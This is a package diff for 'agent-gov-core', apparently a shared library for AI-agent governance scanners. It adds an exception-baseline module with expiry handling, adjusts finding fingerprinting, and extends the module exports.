+ export interface ApplyExceptionsResult {
52
+ /** Findings after exceptions applied: survivors + downgraded expired entries. */
53
+ findings: Finding[];
54
+ /** Count of findings suppressed by an active (non-expired) exception. */
55
+ suppressed: number;
56
+ /** Count of findings surfaced as expired (downgraded + prefixed). */
57
+ expired: number;
58
+ }
59
+ /**
60
+ * Apply a set of exceptions to a finding list. Returns the post-filter
61
+ * list along with counts so a meta-reviewer can report how many findings
62
+ * the baseline suppressed.
63
+ *
64
+ * @example
65
+ * import { applyExceptions } from 'agent-gov-core';
66
+ *
67
+ * const result = applyExceptions(findings, [
68
+ * { kind: 'capability_echo.high_capability_dep_added', salientKey: 'puppeteer', expires: '2026-06-01', reason: 'browser-tests rollout' },
69
+ * { kind: 'task_bound.out_of_scope_file', pathPrefix: 'tools/internal/', reason: 'internal tooling refactor' },
70
+ * ]);
71
+ * console.log(`${result.suppressed} suppressed, ${result.expired} expired`);
72
+ */
73
+ export declare function applyExceptions(findings: readonly Finding[], exceptions: readonly Exception[], now?: Date): ApplyExceptionsResult;
74
+ /**
75
+ * Validate that an unknown value is a well-formed `Exception` shape. Useful
76
+ * when consumers load exceptions from JSON/YAML and want to surface parse-
77
+ * level errors as findings rather than crash.
78
+ */
79
+ export declare function validateException(value: unknown): {
80
+ ok: boolean;
81
+ errors: string[];
82
+ };
83
+ //# sourceMappingURL=exceptions.d.ts.map
@@ -0,0 +1,129 @@
1
+ /**
2
+ * Exception baselines — the "we know about this, suppress it for now" mechanism
3
+ * that PolicyMesh (`.policymesh-exceptions.json`) and TaskBound (`.taskbound.yml`
4
+ * `ignore_kinds` / `allow_paths`) both invented separately. Lifted into the
5
+ * substrate so all five tools share one shape and one expiry contract.
6
+ *
7
+ * Two design choices worth flagging:
8
+ *
9
+ * 1. Expired exceptions DON'T silently drop. They re-surface the original
10
+ * finding with severity downgraded to `'low'` and an `[EXPIRED WHITELIST]`
11
+ * prefix on the message. The point of exception baselines is to make stale
12
+ * suppression visible, not to grow a graveyard of permanent ignores.
13
+ *
14
+ * 2. Match keys are `kind` (required) plus optional `salientKey` and
15
+ * `pathPrefix` narrowing. Subject/path matching from the two consumers
16
+ * maps cleanly: PolicyMesh's `subject` is now `salientKey`; TaskBound's
17
+ * `allow_paths` entries map to `pathPrefix` exceptions on the relevant
18
+ * finding kind.
19
+ */
20
+ const EXPIRED_PREFIX = '[EXPIRED WHITELIST] ';
21
+ const EXPIRED_DOWNGRADE = 'low';
22
+ /**
23
+ * Apply a set of exceptions to a finding list. Returns the post-filter
24
+ * list along with counts so a meta-reviewer can report how many findings
25
+ * the baseline suppressed.
26
+ *
27
+ * @example
28
+ * import { applyExceptions } from 'agent-gov-core';
29
+ *
30
+ * const result = applyExceptions(findings, [
31
+ * { kind: 'capability_echo.high_capability_dep_added', salientKey: 'puppeteer', expires: '2026-06-01', reason: 'browser-tests rollout' },
32
+ * { kind: 'task_bound.out_of_scope_file', pathPrefix: 'tools/internal/', reason: 'internal tooling refactor' },
33
+ * ]);
34
+ * console.log(`${result.suppressed} suppressed, ${result.expired} expired`);
35
+ */
36
+ export function applyExceptions(findings, exceptions, now = new Date()) {
37
+ if (exceptions.length === 0) {
38
+ return { findings: [...findings], suppressed: 0, expired: 0 };
39
+ }
40
+ const result = [];
41
+ let suppressed = 0;
42
+ let expired = 0;
43
+ for (const finding of findings) {
44
+ const match = findMatchingException(finding, exceptions);
45
+ if (!match) {
46
+ result.push(finding);
47
+ continue;
48
+ }
49
+ if (match.expires && isExpired(match.expires, now)) {
50
+ result.push(downgradeExpired(finding, match));
51
+ expired++;
52
+ }
53
+ else {
54
+ suppressed++;
55
+ }
56
+ }
57
+ return { findings: result, suppressed, expired };
58
+ }
59
+ function findMatchingException(finding, exceptions) {
60
+ for (const exc of exceptions) {
61
+ if (exc.kind !== finding.kind)
62
+ continue;
63
+ if (exc.salientKey !== undefined && exc.salientKey !== finding.salientKey)
64
+ continue;
65
+ if (exc.pathPrefix !== undefined) {
66
+ const file = finding.location?.file;
67
+ if (!file || !file.startsWith(exc.pathPrefix))
68
+ continue;
69
+ }
70
+ return exc;
71
+ }
72
+ return undefined;
73
+ }
74
+ function isExpired(expires, now) {
75
+ const parsed = new Date(expires);
76
+ if (Number.isNaN(parsed.getTime()))
77
+ return false;
78
+ return parsed.getTime() < now.getTime();
79
+ }
80
+ function downgradeExpired(finding, exc) {
81
+ const downgraded = {
82
+ ...finding,
83
+ severity: EXPIRED_DOWNGRADE,
84
+ message: EXPIRED_PREFIX + finding.message,
85
+ };
86
+ if (exc.reason !== undefined) {
87
+ downgraded.data = { ...(finding.data ?? {}), exceptionReason: exc.reason };
88
+ }
89
+ return downgraded;
90
+ }
91
+ /**
92
+ * Validate that an unknown value is a well-formed `Exception` shape. Useful
93
+ * when consumers load exceptions from JSON/YAML and want to surface parse-
94
+ * level errors as findings rather than crash.
95
+ */
96
+ export function validateException(value) {
97
+ const errors = [];
98
+ if (value === null || typeof value !== 'object' || Array.isArray(value)) {
99
+ return { ok: false, errors: ['exception must be a plain object'] };
100
+ }
101
+ const v = value;
102
+ if (typeof v.kind !== 'string' || v.kind.length === 0) {
103
+ errors.push('kind must be a non-empty string');
104
+ }
105
+ if (v.salientKey !== undefined && typeof v.salientKey !== 'string') {
106
+ errors.push('salientKey must be a string when present');
107
+ }
108
+ if (v.pathPrefix !== undefined && typeof v.pathPrefix !== 'string') {
109
+ errors.push('pathPrefix must be a string when present');
110
+ }
111
+ if (v.expires !== undefined) {
112
+ if (typeof v.expires !== 'string') {
113
+ errors.push('expires must be an ISO 8601 string when present');
114
+ }
115
+ else if (Number.isNaN(new Date(v.expires).getTime())) {
116
+ errors.push('expires must be a parseable date (e.g. "2026-12-31" or full ISO timestamp)');
117
+ }
118
+ }
119
+ if (v.reason !== undefined && typeof v.reason !== 'string') {
120
+ errors.push('reason must be a string when present');
121
+ }
122
+ const allowed = new Set(['kind', 'salientKey', 'pathPrefix', 'expires', 'reason']);
123
+ for (const key of Object.keys(v)) {
124
+ if (!allowed.has(key))
125
+ errors.push(`unknown property: ${key}`);
126
+ }
127
+ return { ok: errors.length === 0, errors };
128
+ }
129
+ //# sourceMappingURL=exceptions.js.map
package/dist/finding.js CHANGED
@@ -100,11 +100,14 @@ export function fingerprintFinding(finding) {
100
100
  fileNormalized,
101
101
  finding.location?.line ?? '',
102
102
  finding.location?.column ?? '',
103
- // salientKey lets multiple distinct findings at the same (kind, file, line)
104
- // site keep separate fingerprints. Empty string when absent so the hash
105
- // shape is stable across findings that don't need a discriminator.
106
- finding.salientKey ?? '',
107
103
  ];
104
+ // salientKey is appended ONLY when present. Appending `?? ''` would add a
105
+ // trailing pipe even for findings without salientKey, breaking the v0.4.2
106
+ // hash. This way pre-0.4.3 fingerprints stay stable for findings that
107
+ // never set salientKey, while new findings with one stay distinct.
108
+ if (finding.salientKey !== undefined) {
109
+ parts.push(finding.salientKey);
110
+ }
108
111
  return createHash('sha256').update(parts.join('|')).digest('hex').slice(0, 16);
109
112
  }
110
113
  const FINDING_ALLOWED_KEYS = new Set([
package/dist/index.d.ts CHANGED
@@ -4,10 +4,20 @@ export type { JsonObjectWithSource } from './jsonc.js';
4
4
  export { readJsonObjectWithSource, stripJsonComments } from './jsonc.js';
5
5
  export type { TomlObjectWithSource } from './toml.js';
6
6
  export { readTomlObject, parseToml } from './toml.js';
7
+ export { ConfigParseError, lineColumnOfOffset } from './parse-error.js';
8
+ export type { Report, CreateReportSpec, ReportValidationResult } from './report.js';
9
+ export { REPORT_SCHEMA_VERSION, createReport, maxSeverity, validateReport, } from './report.js';
10
+ export type { MergeOptions, MergeSource, InvalidReport, InvalidFinding, MergedReport, } from './merge.js';
11
+ export { mergeFindings } from './merge.js';
12
+ export type { SecretMatch, MatchSecretOptions } from './secrets.js';
13
+ export { matchSecret, SECRET_PATTERNS } from './secrets.js';
14
+ export type { Exception, ApplyExceptionsResult } from './exceptions.js';
15
+ export { applyExceptions, validateException } from './exceptions.js';
7
16
  export type { ByteRange } from './locators.js';
8
17
  export { lineOfJsonKey, lineOfJsonStringValue, lineOfTomlKey, } from './locators.js';
9
18
  export type { McpCommandSpec } from './mcp.js';
10
19
  export { normalizeMcpCommand } from './mcp.js';
11
- export { tokenizeShell, getCommandHead } from './shell.js';
12
- export { rankSeverity, passesSeverityThreshold, anyAtOrAbove, emitFindingAnnotation, } from './action.js';
20
+ export { tokenizeShell, tokenizeShellDeep, getCommandHead } from './shell.js';
21
+ export type { WorkflowSummaryOptions } from './action.js';
22
+ export { rankSeverity, passesSeverityThreshold, anyAtOrAbove, emitFindingAnnotation, generateWorkflowSummary, } from './action.js';
13
23
  //# sourceMappingURL=index.d.ts.map
package/dist/index.js CHANGED
@@ -1,8 +1,13 @@
1
1
  export { SEVERITIES, TOOL_KINDS, isSeverity, isToolKind, isNamespacedKind, kind, createFinding, fingerprintFinding, validateFinding, } from './finding.js';
2
2
  export { readJsonObjectWithSource, stripJsonComments } from './jsonc.js';
3
3
  export { readTomlObject, parseToml } from './toml.js';
4
+ export { ConfigParseError, lineColumnOfOffset } from './parse-error.js';
5
+ export { REPORT_SCHEMA_VERSION, createReport, maxSeverity, validateReport, } from './report.js';
6
+ export { mergeFindings } from './merge.js';
7
+ export { matchSecret, SECRET_PATTERNS } from './secrets.js';
8
+ export { applyExceptions, validateException } from './exceptions.js';
4
9
  export { lineOfJsonKey, lineOfJsonStringValue, lineOfTomlKey, } from './locators.js';
5
10
  export { normalizeMcpCommand } from './mcp.js';
6
- export { tokenizeShell, getCommandHead } from './shell.js';
7
- export { rankSeverity, passesSeverityThreshold, anyAtOrAbove, emitFindingAnnotation, } from './action.js';
11
+ export { tokenizeShell, tokenizeShellDeep, getCommandHead } from './shell.js';
12
+ export { rankSeverity, passesSeverityThreshold, anyAtOrAbove, emitFindingAnnotation, generateWorkflowSummary, } from './action.js';
8
13
  //# sourceMappingURL=index.js.map